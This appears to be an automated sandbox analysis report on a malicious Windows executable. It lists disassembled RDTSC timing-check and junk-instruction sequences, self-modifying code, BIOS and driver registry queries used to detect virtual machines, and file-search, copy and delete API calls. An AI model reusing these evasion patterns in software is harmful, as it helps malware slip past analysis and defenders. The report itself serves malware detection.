Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA3DDF second address: BA3DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA40C0 second address: BA40E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA40E3 second address: BA4107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF154CE3629h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA9944 second address: BA9949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD684 second address: BAD698 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3616h 0x00000008 jl 00007FF154CE3616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC957 second address: BAC95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC95D second address: BAC961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACAA6 second address: BACAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACD64 second address: BACD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACD6F second address: BACD7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACD7A second address: BACD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACEBE second address: BACEF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 jmp 00007FF154EB2276h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF154EB2270h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACEF7 second address: BACEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACEFD second address: BACF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jl 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007FF154EB2266h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACF15 second address: BACF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF154CE3622h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACF30 second address: BACF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD1E5 second address: BAD251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE3629h 0x00000009 jmp 00007FF154CE3627h 0x0000000e popad 0x0000000f jmp 00007FF154CE361Ch 0x00000014 pushad 0x00000015 jmp 00007FF154CE3623h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007FF154CE3616h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 jo 00007FF154CE3616h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD251 second address: BAD256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD256 second address: BAD26A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3618h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF154CE3616h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4D90 second address: BB4D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154EB2266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4ED7 second address: BB4EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF154CE3616h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jns 00007FF154CE361Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB55AE second address: BB55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A07 second address: BB5A4C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF154CE361Ch 0x00000008 jc 00007FF154CE3616h 0x0000000e push esi 0x0000000f jnc 00007FF154CE3616h 0x00000015 jng 00007FF154CE3616h 0x0000001b pop esi 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007FF154CE3635h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A4C second address: BB5A64 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154EB226Eh 0x00000008 jbe 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF154EB226Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6278 second address: BB628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FF154CE361Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB628C second address: BB6298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6298 second address: BB629E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC742 second address: BBC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2276h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC75C second address: BBC760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC311 second address: BBC315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC45F second address: BBC46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC46E second address: BBC472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3001 second address: BC3006 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3006 second address: BC302E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2279h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jbe 00007FF154EB2266h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC302E second address: BC3032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC93F8 second address: BC9404 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9404 second address: BC940D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC940D second address: BC9412 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC5CB second address: BCC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCC277 second address: BCC27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE615F second address: BE6163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6163 second address: BE6169 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6169 second address: BE61C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF154CE361Ch 0x0000000c jmp 00007FF154CE361Fh 0x00000011 jnl 00007FF154CE3632h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF154CE3625h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4A37 second address: BE4A41 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF154EB2281h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4D00 second address: BE4D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4D04 second address: BE4D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4D15 second address: BE4D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF154CE3621h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4D2D second address: BE4D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4D31 second address: BE4D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e js 00007FF154CE361Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4EA4 second address: BE4EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4EAA second address: BE4EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF154CE3629h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4EC8 second address: BE4ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE4ECE second address: BE4ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF154CE3616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9BB7 second address: BE9BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC73E second address: BEC74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC74C second address: BEC750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC750 second address: BEC756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC2F0 second address: BEC314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF154EB227Eh 0x0000000c jmp 00007FF154EB2278h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC314 second address: BEC319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC319 second address: BEC32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jl 00007FF154EB2266h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF83D5 second address: BF83FD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF154CE361Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF154CE3621h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05D79 second address: B05D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FF154EB2266h 0x0000000c popad 0x0000000d jo 00007FF154EB226Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E7A second address: C18E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E7E second address: C18E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E8B second address: C18E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C192B1 second address: C192C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF154EB2266h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jp 00007FF154EB2266h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19427 second address: C1942C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1942C second address: C19436 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB226Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19436 second address: C19442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19442 second address: C19448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19448 second address: C1945E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154CE3616h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FF154CE3616h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C196F3 second address: C19706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154EB226Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19706 second address: C1972E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE3623h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF154CE361Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1986F second address: C19874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1C8EB second address: C1C8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CC1E second address: C1CC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007FF154EB227Ch 0x00000011 push ecx 0x00000012 jmp 00007FF154EB2274h 0x00000017 pop ecx 0x00000018 nop 0x00000019 mov edx, 7892B9C6h 0x0000001e mov dword ptr [ebp+122D2B20h], esi 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FF154EB2268h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 or dh, FFFFFFC2h 0x00000043 push 39682D4Ch 0x00000048 push edi 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CEC4 second address: C1CEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF154CE361Ah 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF154CE361Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CEE3 second address: C1CF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF154EB226Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jbe 00007FF154EB2272h 0x00000014 push dword ptr [ebp+122D1D86h] 0x0000001a mov edx, 1FE901B2h 0x0000001f call 00007FF154EB2269h 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF154EB2274h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CF34 second address: C1CF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CF38 second address: C1CF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FF154EB226Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jno 00007FF154EB2274h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jno 00007FF154EB226Eh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 pop edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF0A second address: C1FF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF0E second address: C1FF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2273h 0x00000007 jnc 00007FF154EB2266h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 jo 00007FF154EB2266h 0x00000018 jmp 00007FF154EB2278h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF154EB2278h 0x00000025 jmp 00007FF154EB2270h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF77 second address: C1FF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C219D7 second address: C219E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43941 second address: B43945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B61 second address: B43B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B65 second address: B43B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF154CE3616h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FF154CE3616h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B7E second address: B43B88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B88 second address: B43B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 991A13 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 991972 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BC38BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 0_2_007438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00744910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0073DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_0073E430
